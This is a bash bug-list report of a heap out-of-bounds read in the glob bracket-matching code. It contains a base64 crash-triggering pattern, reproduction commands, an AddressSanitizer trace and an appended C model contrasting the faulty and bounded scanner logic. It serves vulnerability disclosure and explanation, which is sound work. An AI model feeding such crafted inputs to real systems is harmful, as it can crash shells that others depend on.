bug-bash

out-of-bound read in brackmatch function in "sm_loop.c"


From: op7ic
Subject: out-of-bound read in brackmatch function in "sm_loop.c"
Date: Wed, 2 Nov 2016 12:06:45 +0000

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS:  -DPROGRAM='bash' -DCONF_HOSTTYPE='x86_64'
-DCONF_OSTYPE='linux-gnu' -DCONF_MACHTYPE='x86_64-unknown-linux-gnu'
-DCONF_VENDOR='unknown' -DLOCALEDIR='/usr/share/locale'
-DPACKAGE='bash' -DSHELL -DHAVE_CONFIG_H   -I.  -I. -I./include
-I./lib  -ggdb3 -O0 -Wno-parenthese$
Machine Type: x86_64-unknown-linux-gnu
Bash Version: 4.4
Patch Level: 0
Release Status: release

Description:

An out-of-bounds read was identified in the "brackmatch" function in the
"sm_loop.c" source file when parsing a specially crafted bash source
file. The impact is low and will just result in crashing the
interpreter. To replicate this issue, use the attached sample below and
execute the following command:

./bash PoC.sh

PoC.sh base64 encoded:

Wy5bLio=

Repeat-By:
echo Wy5bLio= > PoC.sh.b64
base64 -d PoC.sh.b64 > PoC.sh
valgrind ./bash PoC.sh


Vulnerable Code:

475       /* POSIX.2 2.8.3.1.2 says: `An expression containing a `[' that
476          is not preceded by a backslash and is not part of a bracket
477          expression produces undefined results.'  This implementation
478          treats the `[' as just a character to be matched if there is
479          not a closing `]'. */
480       if (c == L('\0'))
481         return ((test == L('[')) ? savep : (CHAR *)0);
482
483       c = *p++;
484       c = FOLD (c);
485
486       if ((flags & FNM_PATHNAME) && c == L('/'))
487         /* [/] can never match when matching a pathname.  */
488         return (CHAR *)0;


ASAN Report (bash needs to be compiled with -fsanitize=address):

bash/bash PoC.sh
=================================================================
==30562==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60200000d7fb at pc 0x77eb6c bp 0x759126b50b90 sp 0x759126b50b88
READ of size 1 at 0x60200000d7fb thread T0
    #0 0x77eb6b in brackmatch /opt/bash/lib/glob/sm_loop.c:483
    #1 0x77eb6b in gmatch /opt/bash/lib/glob/sm_loop.c:293
    #2 0x78c559 in gmatch /opt/bash/lib/glob/sm_loop.c:40
    #3 0x78c559 in internal_strmatch /opt/bash/lib/glob/sm_loop.c:42
    #4 0x78c559 in xstrmatch /opt/bash/lib/glob/smatch.c:407
    #5 0x7750b3 in glob_vector /opt/bash/lib/glob/glob.c:806
    #6 0x776fd2 in glob_filename /opt/bash/lib/glob/glob.c:1341
    #7 0x63f5a6 in shell_glob_filename /opt/bash/pathexp.c:413
    #8 0x60c7a6 in glob_expand_word_list /opt/bash/subst.c:10261
    #9 0x60c7a6 in expand_word_list_internal /opt/bash/subst.c:10696
    #10 0x4cf780 in execute_simple_command /opt/bash/execute_cmd.c:4153
    #11 0x4d9414 in execute_command_internal /opt/bash/execute_cmd.c:802
    #12 0x4d9414 in execute_command /opt/bash/execute_cmd.c:405
    #13 0x4384d5 in reader_loop /opt/bash/eval.c:180
    #14 0x42e5f0 in main /opt/bash/shell.c:792
    #15 0x68553d959b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #16 0x4331dc (/opt/bash/bash+0x4331dc)

0x60200000d7fb is located 0 bytes to the right of 11-byte region
[0x60200000d7f0,0x60200000d7fb)
allocated by thread T0 here:
    #0 0x68553e16573f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x6e3a05 in xmalloc /opt/bash/xmalloc.c:112

SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/bash/lib/glob/sm_loop.c:483 brackmatch
Shadow bytes around the buggy address:
  0x0c047fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fd fa fa fa 00[03]
  0x0c047fff9b00: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa 00 00
  0x0c047fff9b10: fa fa fd fa fa fa 00 00 fa fa 06 fa fa fa 00 00
  0x0c047fff9b20: fa fa 00 00 fa fa 06 fa fa fa 00 00 fa fa 07 fa
  0x0c047fff9b30: fa fa fd fa fa fa 07 fa fa fa 05 fa fa fa 05 fa
  0x0c047fff9b40: fa fa 02 fa fa fa fd fa fa fa 07 fa fa fa 07 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==30562==ABORTING
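The C program below is an added illustration of the bug class this report describes; it is not bash's brackmatch or any other bash code, and the report does not show the exact mechanism in bash beyond the quoted excerpt. It models a bracket-expression scanner that, like the excerpt, checks for the terminating NUL only at the top of its loop, while the inner scan for the `.]`, `:]` or `=]` that closes a collating symbol, equivalence class or character class does not, so the unterminated `[.` in the decoded PoC pattern `[.[.*` (that is what `Wy5bLio=` decodes to) walks past the end of the pattern. The bounded variant stops at the NUL and, as the quoted comment says bash does, falls back to treating `[` as an ordinary character; a small glob matcher on top of it shows the literal-bracket behaviour. Everything here is constructed for the example: `struct pat`, `pat_at`, `bracket_end`, `in_set`, `match`, `glob_match`, `poc_overread`, and the fake redzone bytes placed after the pattern. Out-of-bounds reads are recorded rather than performed, so it runs without ASan.

```c
/* Added example, not bash's code: a bracket-expression scanner shaped like the
 * reported bug (NUL checked only at the top of its loop) beside a bounded one,
 * plus a small glob matcher built on the bounded scanner. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Pattern with a simulated heap layout: the first `len` bytes (NUL included) are
 * the allocation, `mem` may carry constructed redzone bytes after them, and
 * pat_at() records the first read past `len` instead of crashing on it. */
struct pat { const char *mem; size_t len, total; long first_oob; };
static char pat_at(struct pat *p, size_t i)
{
    if (i >= p->len && p->first_oob < 0) p->first_oob = (long)i;
    return i < p->total ? p->mem[i] : '\0';
}
static bool class_open(char d) { return d == '.' || d == ':' || d == '='; }

/* Index just past the ']' closing the bracket expression opened at mem[open], or
 * -1 if there is none (the '[' is then an ordinary character). Unbounded, the scan
 * for the ".]" / ":]" / "=]" closer never checks for NUL and so runs off the end. */
static long bracket_end(struct pat *p, size_t open, bool bounded)
{
    size_t i = open + 1;
    if (pat_at(p, i) == '!' || pat_at(p, i) == '^') i++;
    if (pat_at(p, i) == ']') i++;                 /* leading ']' is a member */
    for (;;) {
        char c = pat_at(p, i);
        if (c == '\0') return -1;                 /* sole NUL check when !bounded */
        if (c == '[' && class_open(pat_at(p, i + 1))) {
            char d = pat_at(p, i + 1);
            for (i += 2; !(pat_at(p, i) == d && pat_at(p, i + 1) == ']'); i++) {
                if (bounded && pat_at(p, i) == '\0') return -1;   /* the missing check */
                if (i + 1 >= p->total) return -2;  /* demo guard; real code reads on */
            }
            i += 2;
        } else if (c == ']') return (long)i + 1;
        else i++;
    }
}

/* Is ch in the bracket expression mem[open..close-1]? Ranges and negation are
 * modelled; [.x.], [=x=] and [:name:] items are skipped (closer known to exist). */
static bool in_set(struct pat *p, size_t open, size_t end, char ch)
{
    size_t i = open + 1;
    bool negate = false, hit = false;
    if (pat_at(p, i) == '!' || pat_at(p, i) == '^') { negate = true; i++; }
    if (pat_at(p, i) == ']') { hit = (ch == ']'); i++; }
    while (i + 1 < end) {                         /* mem[end-1] is the ']' */
        char lo = pat_at(p, i), hi = lo;
        if (lo == '[' && class_open(pat_at(p, i + 1))) {
            char d = pat_at(p, i + 1);
            for (i += 2; !(pat_at(p, i) == d && pat_at(p, i + 1) == ']'); i++) ;
            i += 2;
            continue;
        }
        if (pat_at(p, i + 1) == '-' && i + 3 < end) { hi = pat_at(p, i + 2); i += 3; }
        else i++;
        if (lo <= ch && ch <= hi) hit = true;
    }
    return negate ? !hit : hit;
}

/* Match all of s against the pattern from index i: '*', '?' and [...]. */
static bool match(struct pat *p, size_t i, const char *s)
{
    for (;;) {
        char c = pat_at(p, i);
        if (c == '\0') return *s == '\0';
        if (c == '*') {
            while (pat_at(p, i) == '*') i++;
            for (;; s++) { if (match(p, i, s)) return true; if (*s == '\0') return false; }
        }
        if (c == '[') {
            long end = bracket_end(p, i, true);
            if (end >= 0) {                       /* a real bracket expression */
                if (*s == '\0' || !in_set(p, i, (size_t)end, *s)) return false;
                i = (size_t)end; s++; continue;
            }                                     /* else '[' is an ordinary char */
        }
        if (*s == '\0' || (c != '?' && *s != c)) return false;
        i++; s++;
    }
}

static bool glob_match(const char *pattern, const char *s)
{
    struct pat p = { pattern, strlen(pattern) + 1, strlen(pattern) + 1, -1 };
    return match(&p, 0, s);
}

/* The decoded PoC "[.[.*" as a 6-byte allocation followed by constructed redzone
 * bytes that happen to contain ".]", as neighbouring heap data might. */
static const char poc_mem[] = "[.[.*" "\0" "AB.]";

/* First index past the allocation that the scanner reads, or -1 if none. */
static long poc_overread(bool bounded)
{
    struct pat p = { poc_mem, 6, sizeof poc_mem, -1 };
    (void)bracket_end(&p, 0, bounded);
    return p.first_oob;
}
```

`poc_overread(false)` reports the first read one byte past the 6-byte allocation, which is the same position ASan flags above ("0 bytes to the right" of the region); `poc_overread(true)` reports none, and `glob_match("[.[.*", "[.[.x")` matches because both unterminated brackets are taken literally.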